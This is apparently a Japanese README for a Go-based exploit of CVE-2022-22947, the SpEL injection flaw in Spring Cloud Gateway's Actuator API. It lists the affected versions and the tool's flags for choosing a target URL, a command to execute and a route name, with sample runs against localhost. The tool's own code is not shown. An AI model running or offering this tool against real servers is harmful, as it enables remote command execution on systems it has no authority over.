
CVE-2022-22947を対象としたGoベースのエクスプロイト。Spring Cloud GatewayにおけるSpELインジェクションの脆弱性で、Actuator APIを介したリモートコマンド実行を可能にします。
Spring Cloud Gateway はSpringのAPIゲートウェイです。バージョン3.1.0および3.0.6(含む)以前には、SpEL式インジェクションの脆弱性が存在し、攻撃者がActuator APIにアクセスできる場合、この脆弱性を利用して任意のコマンドを実行できます。
使用方法:
➜ ./cve-2022-22947 -h
Usage of cve-2022-22947:
-c string
Execute command, Example: whoami (default "id")
-d Delete route.
-r string
New route name
-u string
Target Url, Example: http://127.0.0.1:8080
# example
[>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -c whoami -r exploit.
[>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -r exploit -d
遭遇した問題:https://darkb1rd.github.io/2022/03/07/yuque/cve-2022-22947%20%E5%B0%8F%E7%82%B9/